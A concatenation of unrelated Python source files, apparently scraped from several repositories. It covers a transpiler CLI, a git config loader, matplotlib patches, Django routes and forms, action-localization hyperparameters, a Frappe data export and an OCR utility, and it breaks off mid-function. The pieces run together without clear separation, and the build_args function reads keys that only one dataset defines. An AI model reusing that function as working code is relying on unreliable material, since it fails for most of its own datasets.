VERBOSITY_NUM_TO_STR = { 1: 'info', 2: 'develop', 3: 'debug', } def is_filename(script: str) -> bool: return script.endswith(__lang_extension__) @click.command(f'Run {__lang_name__} script') @click.argument('script', nargs=1, required=True) @click.option('-v', '--verbose', count=True) @click.option('-t', '--transpile', 'show_transpiled', is_flag=True, default=False) @click.option('-r', '--run', 'run_anyway', is_flag=True, default=False) def main( # pylint:disable=R0915 script: str, show_transpiled: bool, run_anyway: bool, verbose: int ) -> None: script = script.strip() context = TranspilerContext(verbosity=verbose,) if verbose: console.print(f'Verbosity: {info(f"{VERBOSITY_NUM_TO_STR[verbose]} ({verbose})")}') console.print(f'Processing: {info(script)}') console.print() if verbose >= 2: console.print(title(f'{__lang_name__.upper()} info')) print_padded(f'Version {info(__version__)}', 1) for name, value in settings: print_padded(f'{name}: {info(value)}', 1) console.print() if is_filename(script): context.set_filename(script) with open(script, 'r') as script_file: result_script_ast = transpile(file=script_file, context=context) else: result_script_ast = transpile(source=script, context=context) # pylint: disable=no-member if context.verbosity >= 2: # type:ignore print_line() print_center(title('Retokenized')) console.print(context.retokenized, highlight=False) if show_transpiled: print_line() print_center(title('Transpiled')) console.print(prettify(result_script_ast), highlight=False) if not run_anyway: sys.exit(0) if show_transpiled or verbose: print_line() print_center(title('Execution')) execute(result_script_ast, context) sys.exit(0) if __name__ == '__main__': # pylint: disable=E1120 main() <filename>git_pw/config.py<gh_stars>0 """ Configuration loader using 'git-config'. """ import logging from git_pw import utils LOG = logging.getLogger(__name__) class Config(object): def __init__(self): self._git_config = {} def __getattribute__(self, name): # attempt to use any attributes first try: value = super(Config, self).__getattribute__(name) except AttributeError: value = None if value: LOG.debug("Retrieved '{}' setting from cache".format(name)) return value # fallback to reading from git config otherwise value = utils.git_config('pw.{}'.format(name)) if value: LOG.debug("Retrieved '{}' setting from git-config".format(name)) setattr(self, name, value) return value CONF = Config() import numpy as np import datetime def get_patched_date2num(mpl): """Returns a patched version of `matplotlib.dates.date2num`""" def date2num(d): """ Convert datetime objects to Matplotlib dates. Parameters ---------- d : `datetime.datetime` or `numpy.datetime64` or sequences of these Returns ------- float or sequence of floats Number of days since the epoch. See `.get_epoch` for the epoch, which can be changed by :rc:`date.epoch` or `.set_epoch`. If the epoch is "1970-01-01T00:00:00" (default) then noon Jan 1 1970 ("1970-01-01T12:00:00") returns 0.5. Notes ----- The Gregorian calendar is assumed; this is not universal practice. For details see the module docstring. """ # this code is copied from matplotlib with the only modification # being the added block of code that converts pandas nat if hasattr(d, "values"): # this unpacks pandas series or dataframes... d = d.values # make an iterable, but save state to unpack later: iterable = np.iterable(d) if not iterable: d = [d] d = np.asarray(d) if not d.size: # deals with an empty array... return d.astype('float64') if hasattr(d.take(0), 'value'): # elements are pandas objects; temporarily convert data to numbers # pandas nat is defined as the minimum value of int64, # replace all 'min int' values with the string 'nat' and convert # the array to the dtype of the first non-nat value values = np.asarray([x.value for x in d], dtype='object') nat_mask = (np.iinfo('int64').min == values) if not all(nat_mask): _dtype = d[~nat_mask].take(0).to_numpy().dtype else: _dtype = 'timedelta64[us]' # default in case of all NaT d = np.where(nat_mask, 'nat', values).astype(_dtype) # convert to datetime64 arrays, if not already: if not np.issubdtype(d.dtype, np.datetime64): # datetime arrays if not d.size: # deals with an empty array... return d tzi = getattr(d[0], 'tzinfo', None) if tzi is not None: # make datetime naive: d = [dt.astimezone(mpl.dates.UTC).replace(tzinfo=None) for dt in d] d = np.asarray(d) d = d.astype('datetime64[us]') d = mpl.dates._dt64_to_ordinalf(d) return d if iterable else d[0] return date2num def get_patched_is_natively_supported(mpl): """Returns a patched version of `matplotlib.units._is_natively_supported`""" mpl_native = mpl.units._is_natively_supported def is_natively_supported(x, *args, **kwargs): # returns false if x is a timedelta # calls matplotlib's native function for all other dtypes patch_types = (datetime.timedelta, np.timedelta64) if isinstance(x, patch_types): return False if np.iterable(x): if (isinstance(x, np.ndarray) and np.issubdtype(x.dtype, 'timedelta64')): return False try: if hasattr(x[0], 'value'): # pandas nat is defined as the minimum value of int64, # remove all values which are equal to min int values = np.asarray([elem.value for elem in x], dtype='object') mask = (np.iinfo('int64').min == values) x = x[~mask] except IndexError: pass return mpl_native(x, *args, **kwargs) return is_natively_supported def get_patched_registry(mpl): mpl_native = mpl.units.Registry.get_converter def get_converter(self, x): try: if np.iterable(x) and hasattr(x[0], 'value'): # pandas nat is defined as the minimum value of int64, # remove all values which are equal to min int values = np.asarray([elem.value for elem in x], dtype='object') mask = (np.iinfo('int64').min == values) x = x[~mask] except IndexError: pass return mpl_native(self, x) return get_converter <filename>usa_greencard/pages_app/urls.py<gh_stars>0 from django.urls import path from .views import DvProgramView from django.views.generic import TemplateView app_name = "pages_app" urlpatterns = [ path("home/", TemplateView.as_view(template_name="pages_app/home.html"), name="home"), path("dv-program/", TemplateView.as_view(template_name="pages_app/dv_program.html"), name="dv-program"), path("contact/", TemplateView.as_view(template_name="pages_app/contact.html"), name="contact"), path("about/", TemplateView.as_view(template_name="pages_app/about.html"), name="about"), path("how-to-reg/", TemplateView.as_view(template_name="pages_app/how_to_reg.html"), name="how_to_reg"), path("requirements/", TemplateView.as_view(template_name="pages_app/requirements.html"), name="requirements"), path("green-card-process/", TemplateView.as_view(template_name="pages_app/green_card_process.html"), name="green_card_process"), path("advantages/", TemplateView.as_view(template_name="pages_app/advantages.html"), name="advantages"), path("private-entity/", TemplateView.as_view(template_name="pages_app/private_entity.html"), name="private_entity"), path("testimonials/", TemplateView.as_view(template_name="pages_app/testimonials.html"), name="testimonials"), path("terms-conditions/", TemplateView.as_view(template_name="pages_app/terms_conds.html"), name="terms_conds"), path("privacy-policy/", TemplateView.as_view(template_name="pages_app/privacy_policy.html"), name="privacy_policy"), path("eligible-countries/", TemplateView.as_view(template_name="pages_app/eligible_countries.html"), name="eligible_countries"), path("register/", TemplateView.as_view(template_name="pages_app/register.html"), name="register"), ] import json import argparse import numpy as np _CLASS_NAME = { "THUMOS":['BaseballPitch', 'BasketballDunk', 'Billiards', 'CleanAndJerk', 'CliffDiving', 'CricketBowling', 'CricketShot', 'Diving', 'FrisbeeCatch', 'GolfSwing', 'HammerThrow', 'HighJump', 'JavelinThrow', 'LongJump', 'PoleVault', 'Shotput', 'SoccerPenalty', 'TennisSwing', 'ThrowDiscus', 'VolleyballSpiking'], "ActivityNet":['Applying sunscreen', 'Archery', 'Arm wrestling', 'Assembling bicycle', 'BMX', 'Baking cookies', 'Ballet', 'Bathing dog', 'Baton twirling', 'Beach soccer', 'Beer pong', 'Belly dance', 'Blow-drying hair', 'Blowing leaves', 'Braiding hair', 'Breakdancing', 'Brushing hair', 'Brushing teeth', 'Building sandcastles', 'Bullfighting', 'Bungee jumping', 'Calf roping', 'Camel ride', 'Canoeing', 'Capoeira', 'Carving jack-o-lanterns', 'Changing car wheel', 'Cheerleading', 'Chopping wood', 'Clean and jerk', 'Cleaning shoes', 'Cleaning sink', 'Cleaning windows', 'Clipping cat claws', 'Cricket', 'Croquet', 'Cumbia', 'Curling', 'Cutting the grass', 'Decorating the Christmas tree', 'Disc dog', 'Discus throw', 'Dodgeball', 'Doing a powerbomb', 'Doing crunches', 'Doing fencing', 'Doing karate', 'Doing kickboxing', 'Doing motocross', 'Doing nails', 'Doing step aerobics', 'Drinking beer', 'Drinking coffee', 'Drum corps', 'Elliptical trainer', 'Fixing bicycle', 'Fixing the roof', 'Fun sliding down', 'Futsal', 'Gargling mouthwash', 'Getting a haircut', 'Getting a piercing', 'Getting a tattoo', 'Grooming dog', 'Grooming horse', 'Hammer throw', 'Hand car wash', 'Hand washing clothes', 'Hanging wallpaper', 'Having an ice cream', 'High jump', 'Hitting a pinata', 'Hopscotch', 'Horseback riding', 'Hula hoop', 'Hurling', 'Ice fishing', 'Installing carpet', 'Ironing clothes', 'Javelin throw', 'Kayaking', 'Kite flying', 'Kneeling', 'Knitting', 'Laying tile', 'Layup drill in basketball', 'Long jump', 'Longboarding', 'Making a cake', 'Making a lemonade', 'Making a sandwich', 'Making an omelette', 'Mixing drinks', 'Mooping floor', 'Mowing the lawn', 'Paintball', 'Painting', 'Painting fence', 'Painting furniture', 'Peeling potatoes', 'Ping-pong', 'Plastering', 'Plataform diving', 'Playing accordion', 'Playing badminton', 'Playing bagpipes', 'Playing beach volleyball', 'Playing blackjack', 'Playing congas', 'Playing drums', 'Playing field hockey', 'Playing flauta', 'Playing guitarra', 'Playing harmonica', 'Playing ice hockey', 'Playing kickball', 'Playing lacrosse', 'Playing piano', 'Playing polo', 'Playing pool', 'Playing racquetball', 'Playing rubik cube', 'Playing saxophone', 'Playing squash', 'Playing ten pins', 'Playing violin', 'Playing water polo', 'Pole vault', 'Polishing forniture', 'Polishing shoes', 'Powerbocking', 'Preparing pasta', 'Preparing salad', 'Putting in contact lenses', 'Putting on makeup', 'Putting on shoes', 'Rafting', 'Raking leaves', 'Removing curlers', 'Removing ice from car', 'Riding bumper cars', 'River tubing', 'Rock climbing', 'Rock-paper-scissors', 'Rollerblading', 'Roof shingle removal', 'Rope skipping', 'Running a marathon', 'Sailing', 'Scuba diving', 'Sharpening knives', 'Shaving', 'Shaving legs', 'Shot put', 'Shoveling snow', 'Shuffleboard', 'Skateboarding', 'Skiing', 'Slacklining', 'Smoking a cigarette', 'Smoking hookah', 'Snatch', 'Snow tubing', 'Snowboarding', 'Spinning', 'Spread mulch','Springboard diving', 'Starting a campfire', 'Sumo', 'Surfing', 'Swimming', 'Swinging at the playground', 'Table soccer','Tai chi', 'Tango', 'Tennis serve with ball bouncing', 'Throwing darts', 'Trimming branches or hedges', 'Triple jump', 'Tug of war', 'Tumbling', 'Using parallel bars', 'Using the balance beam', 'Using the monkey bar', 'Using the pommel horse', 'Using the rowing machine', 'Using uneven bars', 'Vacuuming floor', 'Volleyball', 'Wakeboarding', 'Walking the dog', 'Washing dishes', 'Washing face', 'Washing hands', 'Waterskiing', 'Waxing skis', 'Welding', 'Windsurfing', 'Wrapping presents', 'Zumba'] } _DATASET_HYPER_PARAMS = { "THUMOS":{ "dropout":0.7, "lr":1e-4, "weight_decay":5e-5, "frames_per_sec":25, "segment_frames_num":16, "sample_segments_num":750, "feature_dim":2048, "action_cls_num":len(_CLASS_NAME["THUMOS"]), "cls_threshold":0.25, "test_upgrade_scale":20, # "data_dir":"/DATA/W-TAL/THU14/", "data_dir":"./data/THUMOS14/", "test_gt_file":"./data/THUMOS14/gt.json", "tiou_thresholds":np.arange(0.1, 1.00, 0.10), "nms_thresh":0.55, "ins_topk_seg":8, "con_topk_seg":3, "bak_topk_seg":3, "loss_lamb_1":2e-3, "loss_lamb_2":5e-5, "loss_lamb_3":2e-4, }, "ActivityNet":{ "dropout":0.7, "lr":1e-4, "weight_decay":0.001, "frames_per_sec":25, "segment_frames_num":16, "sample_segments_num":75, "feature_dim":2048, "action_cls_num":len(_CLASS_NAME["ActivityNet"]), "cls_threshold":0.10, "test_upgrade_scale":20, "data_dir":"/mnt/d/Dataset/ActivityNet1-3_ACMfeat/features", # "data_dir":"/DATA/W-TAL/ActivityNet13/features", "test_gt_file":"/mnt/d/Dataset/ActivityNet1-3_ACMfeat/gt.json", "tiou_thresholds":np.arange(0.50, 1.00, 0.05), "nms_thresh":0.90, "ins_topk_seg":2, "con_topk_seg":10, "bak_topk_seg":10, "loss_lamb_1":5e-3, "loss_lamb_2":5e-5, "loss_lamb_3":0e-4, }, "HACS":{ "dropout":0.7, "lr":1e-4, "weight_decay":0.001, "frames_per_sec":25, "segment_frames_num":16, #number of frames clips as input "sample_segments_num":75, "feature_dim":2048, "action_cls_num":len(_CLASS_NAME["ActivityNet"]), "cls_threshold":0.10, "test_upgrade_scale":20, "data_dir":"/mnt/d/Dataset/hacs_segments_features_I3D/hacs_segments_features", # "data_dir":"/DATA/W-TAL/ActivityNet13/features", "test_gt_file":"/mnt/d/Dataset/hacs_segments_features_I3D/HACS_segments_v1.1.1.json", "tiou_thresholds":np.arange(0.50, 1.00, 0.05), "nms_thresh":0.90, "ins_topk_seg":2, "con_topk_seg":10, "bak_topk_seg":10, "loss_lamb_1":5e-3, "loss_lamb_2":5e-5, "loss_lamb_3":0e-4, }, "HACStoAct":{ "dropout":0.7, "lr":1e-4, "weight_decay":0.001, "frames_per_sec":25, "segment_frames_num":16, #number of frames clips as input "sample_segments_num":75, "feature_dim":2048, "action_cls_num":len(_CLASS_NAME["ActivityNet"]), "cls_threshold":0.10, "test_upgrade_scale":20, "src_data_dir":"/mnt/d/Dataset/hacs_segments_features_I3D/features", "src_test_gt_file":"/mnt/d/Dataset/hacs_segments_features_I3D/gt.json", "tgt_data_dir":"/mnt/d/Dataset/ActivityNet1-3_ACMfeat/features", "tgt_test_gt_file":"/mnt/d/Dataset/ActivityNet1-3_ACMfeat/gt.json", "tiou_thresholds":np.arange(0.50, 1.00, 0.05), "nms_thresh":0.90, "ins_topk_seg":2, "con_topk_seg":10, "bak_topk_seg":10, "loss_lamb_1":5e-3, "loss_lamb_2":5e-5, "loss_lamb_3":0e-4, "r_easy": 5, "r_hard": 20, "m" : 3, "M" : 6 }} def build_args(dataset=None): parser = argparse.ArgumentParser("This script is used for the weakly-supervised temporal aciton localization task.") parser.add_argument("--checkpoint", default=None, type=str) parser.add_argument("--start_epoch", default=0, type=int) parser.add_argument("--gpu", default='0', type=str) parser.add_argument("--num_workers", default=6, type=int) parser.add_argument("--dataset", default="THUMOS", type=str) parser.add_argument("--batch_size", default=16, type=int) parser.add_argument("--epochs", default=1000, type=int) parser.add_argument("--without_wandb", action="store_true") parser.add_argument("--test", action="store_true") args = parser.parse_args() if dataset is not None: args.dataset = dataset # Based on the selected dataset, we set dataset specific hyper-params. if args.dataset == "HACStoAct": args.class_name_lst = _CLASS_NAME['ActivityNet'] else: args.class_name_lst = _CLASS_NAME[args.dataset] args.action_cls_num = _DATASET_HYPER_PARAMS[args.dataset]["action_cls_num"] args.dropout = _DATASET_HYPER_PARAMS[args.dataset]["dropout"] args.lr = _DATASET_HYPER_PARAMS[args.dataset]["lr"] args.weight_decay = _DATASET_HYPER_PARAMS[args.dataset]["weight_decay"] args.frames_per_sec = _DATASET_HYPER_PARAMS[args.dataset]["frames_per_sec"] args.segment_frames_num = _DATASET_HYPER_PARAMS[args.dataset]["segment_frames_num"] args.sample_segments_num = _DATASET_HYPER_PARAMS[args.dataset]["sample_segments_num"] args.feature_dim = _DATASET_HYPER_PARAMS[args.dataset]["feature_dim"] args.cls_threshold = _DATASET_HYPER_PARAMS[args.dataset]["cls_threshold"] args.tiou_thresholds = _DATASET_HYPER_PARAMS[args.dataset]["tiou_thresholds"] #args.test_gt_file_path = _DATASET_HYPER_PARAMS[args.dataset]["test_gt_file"] args.src_test_gt_file_path = _DATASET_HYPER_PARAMS[args.dataset]["src_test_gt_file"] args.tgt_test_gt_file_path = _DATASET_HYPER_PARAMS[args.dataset]["tgt_test_gt_file"] #args.data_dir = _DATASET_HYPER_PARAMS[args.dataset]["data_dir"] args.src_data_dir = _DATASET_HYPER_PARAMS[args.dataset]["src_data_dir"] args.tgt_data_dir = _DATASET_HYPER_PARAMS[args.dataset]["tgt_data_dir"] args.test_upgrade_scale = _DATASET_HYPER_PARAMS[args.dataset]["test_upgrade_scale"] args.nms_thresh = _DATASET_HYPER_PARAMS[args.dataset]["nms_thresh"] args.ins_topk_seg = _DATASET_HYPER_PARAMS[args.dataset]["ins_topk_seg"] args.con_topk_seg = _DATASET_HYPER_PARAMS[args.dataset]["con_topk_seg"] args.bak_topk_seg = _DATASET_HYPER_PARAMS[args.dataset]["bak_topk_seg"] args.loss_lamb_1 = _DATASET_HYPER_PARAMS[args.dataset]["loss_lamb_1"] args.loss_lamb_2 = _DATASET_HYPER_PARAMS[args.dataset]["loss_lamb_2"] args.loss_lamb_3 = _DATASET_HYPER_PARAMS[args.dataset]["loss_lamb_3"] args.r_easy = _DATASET_HYPER_PARAMS[args.dataset]["r_easy"] args.r_hard = _DATASET_HYPER_PARAMS[args.dataset]["r_hard"] args.m = _DATASET_HYPER_PARAMS[args.dataset]["m"] args.M = _DATASET_HYPER_PARAMS[args.dataset]["M"] return args<reponame>kyhau/aws-lambdas<gh_stars>0 def test_nothing(): assert 2+2==2*2<filename>LeetCode/python3/946.py class Solution: def validateStackSequences(self, pushed: List[int], popped: List[int]) -> bool: res = [] i, n = 0, len(popped) for p in pushed: res.append(p) while res and i < n and res[-1] == popped[i]: i += 1 res.pop() return i == n<gh_stars>1000+ from packetbeat import BaseTest """ Tests that the negotiation phase at the beginning of a mysql connection doesn't leave the parser in a broken state. """ class Test(BaseTest): def test_connection_phase(self): """ This tests that requests are still captured from a mysql stream that starts with the "connection phase" negotiation. """ self.render_config_template( mysql_ports=[3306], ) self.run_packetbeat(pcap="mysql_connection.pcap") objs = self.read_output() assert len(objs) == 1 assert objs[0]['query'] == 'SELECT DATABASE()' # -*- coding: utf-8 -*- # Copyright (c) 2019, Frappe Technologies and contributors # For license information, please see license.txt from __future__ import unicode_literals import frappe import json from frappe import _ from frappe.model.document import Document from frappe.utils.verified_command import get_signed_params class PersonalDataDownloadRequest(Document): def after_insert(self): personal_data = get_user_data(self.user) self.generate_file_and_send_mail(personal_data) def generate_file_and_send_mail(self, personal_data): """generate the file link for download""" user_name = self.user_name.replace(' ','-') f = frappe.get_doc({ 'doctype': 'File', 'file_name': 'Personal-Data-'+user_name+'-'+self.name+'.json', "attached_to_doctype": 'Personal Data Download Request', "attached_to_name": self.name, 'content': str(personal_data), 'is_private': 1 }) f.save(ignore_permissions=True) file_link = frappe.utils.get_url("/api/method/frappe.core.doctype.file.file.download_file") +\ "?" + get_signed_params({"file_url": f.file_url}) host_name = frappe.local.site frappe.sendmail( recipients=self.user, subject=_("Download Your Data"), template="download_data", args={ 'user': self.user, 'user_name': self.user_name, 'link': file_link, 'host_name': host_name }, header=[_("Download Your Data"), "green"] ) def get_user_data(user): """ returns user data not linked to User doctype """ hooks = frappe.get_hooks("user_privacy_documents") data = {} for hook in hooks: d = data.get(hook.get('doctype'),[]) d += frappe.get_all(hook.get('doctype'), {hook.get('match_field'): user}, ["*"]) if d: data.update({ hook.get('doctype'):d }) return json.dumps(data, indent=2, default=str)def create_adjacency_matrix(vec_num, edges, directed=True): matrix = [] if directed: for i in range(vec_num): matrix.append([]) for j in range(vec_num): if [i, j] in edges: matrix[i].append(1) else: matrix[i].append(0) else: for i in range(vec_num): matrix.append([]) for j in range(vec_num): matrix[i].append(0) for edge in edges: x = edge[0] y = edge[1] matrix[x][y] = 1 matrix[y][x] = 1 return matrix def create_incidence_matrix(vec_num, edges, directed=True): matrix = [] if directed: for i in range(vec_num): matrix.append([]) for j in range(len(edges)): if i == edges[j][0]: matrix[i].append(1) elif i == edges[j][1]: matrix[i].append(-1) else: matrix[i].append(0) else: for i in range(vec_num): matrix.append([]) for j in range(len(edges)): if i == edges[j][0] or i == edges[j][1]: matrix[i].append(1) else: matrix[i].append(0) return matrix def create_adjacency_list(vec_num, edges, directed=True): matrix = [] if directed: print("directed") for i in range(vec_num): matrix.append([]) for edge in edges: if i == edge[0]: matrix[i].append(edge[1]) else: print("undirected") for i in range(vec_num): matrix.append([]) for edge in edges: if i == edge[0]: matrix[i].append(edge[1]) elif i == edge[1]: matrix[i].append(edge[0]) return matrix """ Orlov Plugins : Picture Utility. """ import os import logging try: import cv2 import numpy as np import pyocr import pyocr.builders from PIL import Image except ModuleNotFoundError as e: print(str(e)) from orlov.exception import PictureError, OcrError PMC_THRESHOLD = 0.96 L = logging.getLogger(__name__) class POINT(object): """ PatternMatch Point Object. Attributes: x(int): Start Point X position. y(int): Start Point Y position. width(int): Target Image Width. height(int): Target Image Height. """ def __init__(self, x, y, width, height): self.x = x self.y = y self.width = width self.height = height def __repr__(self) -> str: return 'POINT()' def __str__(self) -> str: return '(X, Y) = (%s, %s), Width = %s, Height = %s' \ % (self.x, self.y, self.width, self.height) # pylint: disable=E1101 class Picture(object): """ Picture Module. """ @classmethod def exists(cls, filename): """ picture file exists. Arguments: filename(str): picture filename. Raises: PictureError: file not founds. Returns: exists(bool): file exist or not. """ if os.path.exists(filename): return True else: L.warning('%s is not exists.', filename) raise PictureError('%s is not exists.' % filename) @classmethod def open(cls, filename): """ picture file open. Arguments: filename(str): picture filename. Raises: PictureError: 1). file not founds. 2). file not opens. Returns: image(PIL.Image): opened PIL Image Object. """ if cls.exists(filename): try: return Image.open(filename, 'r') except IOError as e: L.warning('I/O Error %s', str(e)) raise PictureError('it is not success of loading picture %s' % filename) @classmethod def save(cls, pic, filepath, q=100, opt=True): """ picture file save. Arguments: pic(PIL.Image): PIL Image Object. filepath(str): Save Target Path. q(int): Save Quality. opt(bool): Save Optimized. Raises: PictureError: Could not find target parent directory. Returns: filepath(str): Save Target FilePath. """ #cls.exists(filepath) if not os.path.exists(os.path.dirname(filepath)): raise PictureError('it is not exists parents directory. : %s' % os.path.dirname(filepath)) pic.save(filepath, quality=q, optimize=opt) return filepath @classmethod def to_opencv(cls, pic): """ Exchanged PIL.Image to OpenCV Image. Arguments: pic(PIL.Image): PIL Image Object. Raises: PictureError: PIL.Images is None. Returns: data(numpy.ndarray): OpenCV Image Data. """ if pic is None: raise PictureError('it is not create opencv_pic.') return np.asarray(pic) @classmethod def to_pil(cls, opencv_pic): """ Exchanged OpenCV Image to PIL.Image. Arguments: opencv_pic(numpy.ndarray): OpenCV Image Data. Raises: PictureError: Not Excnahged Picture. Returns: data(PIL.Image): PIL.Images. """ try: return Image.fromarray(opencv_pic) except Exception as e: L.warning(str(e)) raise PictureError('it is not exchange pic.') @classmethod def resize(cls, pic, size): """ Resized Picture. Arguments: pic(PIL.Image): PIL.Image. size(str): resize resolution. only 240P, 360P, 480P, 720P, 1080P. Returns: image(PIL.Image): opened PIL Image Object. """ sz = 240 if size == '240P': sz = 240 elif size == '360P': sz = 360 elif size == '480P': sz = 480 elif size == '720P': sz = 720 elif size == '1080P': sz = 1080 else: return None #L.info("Base : %s" % str(pic.size)) width = float((float(pic.size[0]) * sz)) / float(pic.size[1]) res = (int(width), sz) #L.info("Resize : %s" % str(res)) return pic.resize(res) @classmethod def _patternmatch(cls, reference, target, box=None): """ PatternMatch Base Method. Arguments: reference(str): Reference Picture FilePath. target(str): Target Picture FilePath. box(tuple): restrict target box. Raises: PictureError: 1). Could not find reference file. 2). Could not find target file. Returns: result(box): Pattern Match Result. reference(str): reference filepath. """ if not os.path.exists(reference): raise PictureError('it is not exists reference file. : %s' % reference) if not os.path.exists(target): raise PictureError('it is not exists target file. : %s' % target) reference_cv = cv2.imread(reference) target_cv = cv2.imread(target, 0) return cls.__patternmatch(reference_cv, target_cv, box) @classmethod def __patternmatch(cls, reference, target, box=None, tmp=None): """ PatternMatch Base Method. Arguments: reference(str): Reference Picture FilePath. target(str): Target Picture FilePath. box(tuple): restrict target box. tmp(str): temporary folder path. Raises: PictureError: 1). Could not find reference file. 2). Could not find target file. Returns: result(box): Pattern Match Result. reference(str): reference filepath. """ if len(reference.shape) == 3: height, width, _ = reference.shape[:3] else: height, width = reference.shape[:2] if box is None: box = POINT(0, 0, width, height) cv2.rectangle(reference, (box.x, box.y), (box.x + box.width, box.y + box.height), (0, 255, 0), 5) img_gray = cv2.cvtColor(reference, cv2.COLOR_BGR2GRAY) img_gray = img_gray[box.y:(box.y + box.height), box.x:(box.x + box.width)] if tmp: cv2.imwrite(os.path.join(tmp, 'crop.png'), img_gray) template = target w, h = template.shape[::-1] res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED) loc = np.where(res >= PMC_THRESHOLD) result = None for pt in zip(*loc[::-1]): x = pt[0] + box.x y = pt[1] + box.y result = POINT(x, y, w, h) cv2.rectangle(reference, (x, y), (x + w, y + h), (0, 0, 255), 5) return result, reference @classmethod def search_pattern(cls, reference, target, box=None, tmp=None): """ PatternMatch Method. Arguments: reference(str): Reference Picture FilePath. target(str): Target Picture FilePath. box(tuple): restrict target box. tmp(str): temporary folder path. Raises: PictureError: 1). Could not find reference file. 2). Could not find target file. Returns: result(box): Pattern Match Result. reference(str): reference filepath. """ if not os.path.exists(target): raise PictureError('it is not exists target file. : %s' % target) target_cv = cv2.imread(target, 0) return cls.__patternmatch(reference, target_cv, box, tmp) class Singleton(type): """ Singleton meta-class """ _instances = {} def __call__(cls, *args, **kwargs): if cls not in cls._instances: cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs) return cls._instances[cls] # pylint: disable=E1101 class Ocr(object): """ OCR Module """ @classmethod def __tool_initialize(cls): tools = pyocr.get_available_tools() if not tools: raise OcrError('No OCR tool found.') return tools[0] @classmethod def __language_initialize(cls, tool): L.info('Will use tool "%s"', (tool.get_name())) langs = tool.get_available_languages() L.info('Available languages: %s', ', '.join(langs)) lang = langs[0] L.info('Will use lang "%s"', lang) return lang @classmethod def __img_to_string(cls, reference, box=None, tmp=None, _lang='eng'): """ OCR Image to String Method. Arguments: reference(str): Reference Picture FilePath. box(tuple): restrict target box. tmp(str): temporary folder path. _lang(str): ocr base languages. Raises: PictureError: 1). Could not find reference file. 2). Could not find target file. Returns: txt(str): Search Text. reference(str): reference filepath. """ if len(reference.shape) == 3: height, width, _ = reference.shape[:3] else: height, width = reference.shape[:2] if not box: box = POINT(0, 0, width, height) cv2.rectangle(reference, (box.x, box.y), (box.x + box.width, box.y + box.height), (255, 0, 0), 5) img_gray = cv2.cvtColor(reference, cv2.COLOR_BGR2GRAY) img_gray = img_gray[box.y:(box.y + box.height), box.x:(box.x + box.width)] if tmp: cv2.imwrite(os.path.join(tmp, 'crop_ocr.png'), img_gray) txt = cls.__tool_initialize().image_to_string( Picture.to_pil(img_gray), lang=_lang, builder=pyocr.builders.TextBuilder(tesseract_layout=6)) return txt, reference @classmethod def img_to_string(cls, reference, box=None, tmp=None, _lang='eng'): """ OCR Image to String Method. Arguments: reference(str): Reference Picture FilePath. box(tuple): restrict target box. tmp(str): temporary folder path. _lang(str): ocr base languages. Raises: PictureError: 1). Could not find reference file. 2). Could not find target file. Returns: txt(str): Search Text. reference(str): reference filepath. """ txt, _ = cls.__img_to_string(reference, box, tmp, _lang) L.debug('Get Text -> %s', txt) return txt, reference @classmethod def file_to_string(cls, filename, box=None, tmp=None, _lang='eng'): """ OCR File to String Method. Arguments: filename(str): Reference Picture FilePath. box(tuple): restrict target box. tmp(str): temporary folder path. _lang(str): ocr base languages. Raises: PictureError: 1). Could not find reference file. 2). Could not find target file. Returns: txt(str): Search Text. """ if not os.path.exists(filename): raise PictureError('it is not exists reference file. : %s' % filename) ref_cv = cv2.imread(filename) txt, _ = cls.__img_to_string(ref_cv, box, tmp, _lang) L.info('%s -> %s', filename, txt) return txt <reponame>jplusplus/feowl from django import forms from django.contrib.auth.forms import ReadOnlyPasswordHashField from django.utils.translation import ugettext_lazy as _ from models import PowerReport, Device, Contributor, Area class ContributorAdminForm(forms.ModelForm): name = forms.RegexField( label=_("Name"), max_length=30, regex=r"^[\w.@+-]+$", help_text=_("Required. 30 characters or fewer. Letters, digits and " "@/./+/-/_ only."), error_messages={ 'invalid': _("This value may contain only letters, numbers and " "@/./+/-/_ characters.")}) password = ReadOnlyPasswordHashField(label=_("Password"), help_text=_("Raw passwords are not stored, so there is no way to see " "this user's password, but you can change the password " "using <a href=\"password/\">this form</a>.")) def clean_password(self): return self.initial["password"] class Meta: model = Contributor class ContributorForm(forms.ModelForm): class Meta: model = Contributor class PowerReportForm(forms.ModelForm): class Meta: model = PowerReport def clean_duration(self): duration = self.cleaned_data['duration'] #ensure that duration is a positive number (PositiveInteger fields can be == 0) if duration == 0: raise forms.ValidationError('Duration values must be larger than 0.') return duration class DeviceForm(forms.ModelForm): class Meta: model = Device class AreaForm(forms.ModelForm): class Meta: model = Area #!/usr/bin/env python3 # ## @file # edkrepo_cli.py # # Copyright (c) 2017 - 2020, Intel Corporation. All rights reserved.<BR> # SPDX-License-Identifier: BSD-2-Clause-Patent # import argparse from operator import itemgetter import sys import traceback import pkg_resources import time import json import os import subprocess import site import inspect import importlib.util import datetime as dt from git.exc import GitCommandError from edkrepo.commands import command_factory from edkrepo.config import config_factory from edkrepo.common.edkrepo_exception import EdkrepoException, EdkrepoGlobalConfigNotFoundException from edkrepo.common.edkrepo_exception import EdkrepoWarningException from edkrepo.common.edkrepo_exception import EdkrepoConfigFileInvalidException from edkrepo.common.humble import KEYBOARD_INTERRUPT, GIT_CMD_ERROR from edkrepo.common.pathfix import get_actual_path def generate_command_line(command): parser = argparse.ArgumentParser() subparsers = parser.add_subparsers(dest='subparser_name') try: version = pkg_resources.get_distribution("edkrepo").version parser.add_argument("--version", action="version", version="%(prog)s {0}".format(version)) except: #To prevent errors if edkrepo is being run without being installed parser.add_argument("--version", action="version", version="%(prog)s 0.0.0") #command_names = command.command_list() for command_name in command.command_list(): subparser_name = 'parser_' + command_name command_name_metadata = command.get_metadata(command_name) if 'alias' in command_name_metadata: subparser_name = subparsers.add_parser(command_name, aliases=[command_name_metadata['alias']], help=command_name_metadata['help-text'], description=command_name_metadata['help-text'], formatter_class=argparse.RawTextHelpFormatter) else: subparser_name = subparsers.add_parser(command_name, help=command_name_metadata['help-text'], description=command_name_metadata['help-text'], formatter_class=argparse.RawTextHelpFormatter) #break arg list up into positional and non-positional arg lists positional_args = [] non_positional_args = [] choice_args = [] for arg in command_name_metadata['arguments']: if arg.get('positional'): positional_args.append(arg) elif arg.get('choice'): choice_args.append(arg) else: non_positional_args.append(arg) #if there are more than 1 positional args sort them by position and add to the subparser if positional_args != [] and len(positional_args) > 1: positional_args = sorted(positional_args, key=itemgetter('position')) #add positional args for arg in positional_args: #check for choices if arg.get('choices'): choices = [] help_text = arg.get('help-text') for choice in choice_args: if choice.get('parent') == arg.get('name'): 